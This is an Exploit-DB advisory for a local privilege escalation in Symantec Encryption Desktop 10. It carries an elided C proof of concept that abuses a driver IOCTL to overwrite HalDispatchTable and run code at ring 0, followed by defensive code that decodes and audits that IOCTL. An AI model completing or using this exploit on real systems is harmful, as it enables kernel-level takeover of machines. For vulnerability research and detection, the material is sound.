Symantec Encryption Desktop 10 - Local Buffer Overflow / Local Privilege Escalation

EDB-ID: 38299
Platform: Windows
Date: 2012-02-25


source: https://www.securityfocus.com/bid/57835/info

Symantec Encryption Desktop is prone to a local buffer-overflow vulnerability. 

A local attacker may exploit this issue to execute arbitrary code with escalated privileges.

#define IO_CONTROL_VULN 0x80022058
 
#define TARGET_DEVICE L"\\Device\\pgpwdef"
 
[..]
 
    usName.Buffer = TARGET_DEVICE;
    usName.Length = usName.MaximumLength = (USHORT)(wcslen(usName.Buffer) * sizeof(WCHAR));
 
    InitializeObjectAttributes(&ObjAttr, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);
 
 
    // get handle of target device
    ns = f_NtOpenFile(
        &hDev,
        FILE_READ_DATA | FILE_WRITE_DATA | SYNCHRONIZE,
        &ObjAttr,
        &StatusBlock,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        FILE_SYNCHRONOUS_IO_NONALERT
    );
 
[..]
 
    BOOL bStatus = DeviceIoControl(
        hDev,
        IO_CONTROL_VULN,
        InBuff, 0x8,
        OutBuff, 0x8,
        &dwReturnLen, NULL
    );
 
    dwReturnLen = 0;
    bStatus = DeviceIoControl(
        hDev,
        IO_CONTROL_VULN,
        InBuff, sizeof(PVOID),
        (PUCHAR)m_HalDispatchTable, 0,
        &dwReturnLen, NULL
    );
 
[..]
 
    f_NtQueryIntervalProfile(ProfileTotalIssues, &Interval);
 
[..]
 
Your evil code processes with CPL==0
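
For triage, the control code and the two DeviceIoControl calls above can be decoded and audited as follows. This is an added example, not part of the original advisory or PoC: `decode_ioctl`, `audit_request` and the `AUDIT_*` flags are hypothetical names, and the pointer value in `main` is a constructed placeholder.

```c
#include <stdint.h>
#include <stdio.h>

/* CTL_CODE layout: bits 31-16 device type, 15-14 required access,
   13-2 function number, 1-0 transfer method. */
typedef struct {
    uint16_t device_type;
    uint8_t  access;   /* 0 = FILE_ANY_ACCESS */
    uint16_t function;
    uint8_t  method;   /* 0 = METHOD_BUFFERED, 3 = METHOD_NEITHER */
} ioctl_fields;

ioctl_fields decode_ioctl(uint32_t code) {
    ioctl_fields f;
    f.device_type = (uint16_t)(code >> 16);
    f.access      = (uint8_t)((code >> 14) & 0x3);
    f.function    = (uint16_t)((code >> 2) & 0xFFF);
    f.method      = (uint8_t)(code & 0x3);
    return f;
}

/* Hypothetical audit flags for a logged or fuzzed IOCTL request. */
enum {
    AUDIT_ANY_ACCESS       = 1, /* code itself demands no read/write right */
    AUDIT_VENDOR_DEFINED   = 2, /* device type >= 0x8000 or function >= 0x800 */
    AUDIT_OUT_PTR_ZERO_LEN = 4  /* output pointer supplied with declared length 0 */
};

unsigned audit_request(uint32_t code, uint64_t out_ptr, uint32_t out_len) {
    ioctl_fields f = decode_ioctl(code);
    unsigned flags = 0;
    if (f.access == 0) flags |= AUDIT_ANY_ACCESS;
    if (f.device_type >= 0x8000 || f.function >= 0x800) flags |= AUDIT_VENDOR_DEFINED;
    /* A driver must never return more bytes than the declared output
       length, so a non-null pointer with length 0 deserves attention. */
    if (out_ptr != 0 && out_len == 0) flags |= AUDIT_OUT_PTR_ZERO_LEN;
    return flags;
}

int main(void) {
    ioctl_fields f = decode_ioctl(0x80022058u); /* IO_CONTROL_VULN from the page */
    printf("type=0x%X access=%u function=0x%X method=%u\n",
           (unsigned)f.device_type, (unsigned)f.access,
           (unsigned)f.function, (unsigned)f.method);
    /* 0x1000 is a constructed placeholder pointer, not a real address. */
    printf("first call flags:  0x%X\n", audit_request(0x80022058u, 0x1000, 8));
    printf("second call flags: 0x%X\n", audit_request(0x80022058u, 0x1000, 0));
    return 0;
}
```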